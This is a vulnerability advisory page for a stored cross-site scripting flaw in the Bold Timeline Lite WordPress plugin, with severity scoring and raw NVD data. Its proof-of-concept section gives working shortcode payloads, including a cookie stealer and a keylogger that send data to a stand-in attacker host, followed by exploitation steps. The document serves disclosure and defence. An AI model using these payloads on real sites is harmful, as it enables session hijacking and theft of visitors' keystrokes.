Security Vulnerability Report
中文
CVE-2025-14032 CVSS 6.4 MEDIUM

CVE-2025-14032

Published: 2025-12-12 04:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Bold Timeline Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter in the 'bold_timeline_group' shortcode in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Bold Timeline Lite <= 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14032 PoC - Bold Timeline Lite Stored XSS // Author: Contributor+ level WordPress user // Target: WordPress site with Bold Timeline Lite plugin <= 1.2.7 // Method 1: Via WordPress Shortcode (in post/page content) [bold_timeline_group title='<script>alert(document.cookie)</script>'] // Method 2: More sophisticated payload for session hijacking [bold_timeline_group title='<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">'] // Method 3: DOM-based keylogger [bold_timeline_group title='<script>document.addEventListener('keypress',function(e){new Image().src='https://attacker.com/log?k='+e.key})</script>'] // Exploitation steps: // 1. Login to WordPress as Contributor or higher // 2. Create/Edit a post or page // 3. Insert the malicious shortcode // 4. Publish or preview the content // 5. Any user visiting the page will execute the injected JavaScript

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14032", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:46.040", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Bold Timeline Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter in the 'bold_timeline_group' shortcode in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/bold-timeline-lite/tags/1.2.7/assets/views/bold_timeline_group_view.php#L79", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/bold-timeline-lite/trunk/assets/views/bold_timeline_group_view.php#L79", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3417223/", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/bold-timeline-lite", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/840fd950-3ce3-4068-b8bc-270f168a5091?source=cve", "source": "[email protected]"}]}}